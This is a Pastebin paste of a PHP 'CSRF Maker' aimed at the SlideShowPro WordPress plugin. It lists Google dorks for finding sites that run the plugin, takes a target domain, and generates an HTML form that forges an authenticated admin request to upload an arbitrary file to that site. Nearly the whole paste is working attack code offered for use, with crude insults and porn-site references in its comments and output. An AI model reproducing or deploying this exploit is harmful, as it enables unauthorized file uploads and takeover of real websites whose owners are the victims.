API tools faq
paste
Advertisement
0xspade

WP Slideshowpro plugin CSRF Maker

0xspade
Jan 9th, 2017
313
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 2.08 KB | None | 0 0
raw download clone embed print report
  1. <?
  2. //Spade here :o
  3. //CSRF x SlideShowPro | Wordpress Plugin
  4. //For more info >> https://cxsecurity.com/issue/WLB-2017010034
  5. //beeg.com - youjizz.com - pornhub.com -torjackan.info and many more
  6. ini_set('error_reporting',0);
  7.     if(!isset($_POST['website'])){
  8.         ?>
  9.         <center>
  10.             <p1>Spade | CSRF Maker Shit </p1><br>
  11.             <p1>Feat. Wordpress Plugin:: slideshowpro</p1><br>
  12.             <p1>P R E S E N T S</p1><br>
  13.             <h1>Arbituary File Upload (Shit)!</h1><br><hr>
  14.             Dorks::
  15.             <br>
  16.                 <a href='https://www.google.com.ph/search?q=inurl%3A%2Fwp-content%2Fplugin%2Fslide-show-pro%2F' target='_blank' >Dork 1</a>
  17.             <br>
  18.                 <a href='https://www.google.com.ph/search?q=inurl%3Aplugin%2Fslide-show-pro%2F' target='_blank' >Dork 2</a>
  19.             <br>
  20.                 <a href='https://www.google.com.ph/search?q=inurl%3A%2Fwp-content%2Fuploads%2Fslideshowpro%2F' target='_blank' >Dork 3</a>
  21.             <form action='' method='POST' autocomplete="off">
  22.                 <input type='text' name='website' placeholder='e.g.: example.com' maxlength="15" />
  23.                 <input type='submit' value='>>' />
  24.             </form>
  25.         </center>
  26.         <?
  27.     }else{
  28.         $website = filter_var(htmlspecialchars($_POST['website']), FILTER_SANITIZE_STRING);
  29.         mkdir('.~Spade_CSRF', 0777);
  30.         chdir('.~Spade_CSRF');
  31.         $file = fopen($website.'.html', 'w');
  32.         $html = "
  33.             <html>
  34.                 <body>
  35.                     <center>
  36.                     <h1>\m/ SlideShowPro CSRF \m/</h1>
  37.                     <form action='http://".$website."/wp-admin/admin.php?page=slideshowpro_manage' method='POST' enctype='multipart/form-data'>
  38.                     <input type='hidden' name='task' value='pro_add_new_album' />
  39.                     <input type='hidden' name='album_name' value='Spade Album' />
  40.                     <input type='hidden' name='album_desc' value='Arbituary File Upload' />
  41.                     <input type='file' name='album_img' />
  42.                     <input type='submit' value='Submit' />
  43.                     </center>
  44.                 </body>
  45.             </html>
  46.         ";
  47.         $write = fwrite($file, $html);
  48.         if(!$write){
  49.             echo "<center>An Error Occured While Creating CSRF Files!</center>";
  50.         }else{
  51.             echo "<center><a href='.~Spade_CSRF/".$website.".html'>There You Go Asshole[Click Me Idiot!].</a></center>";
  52.         }
  53.         fclose($file);
  54.     }
  55.  
  56. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!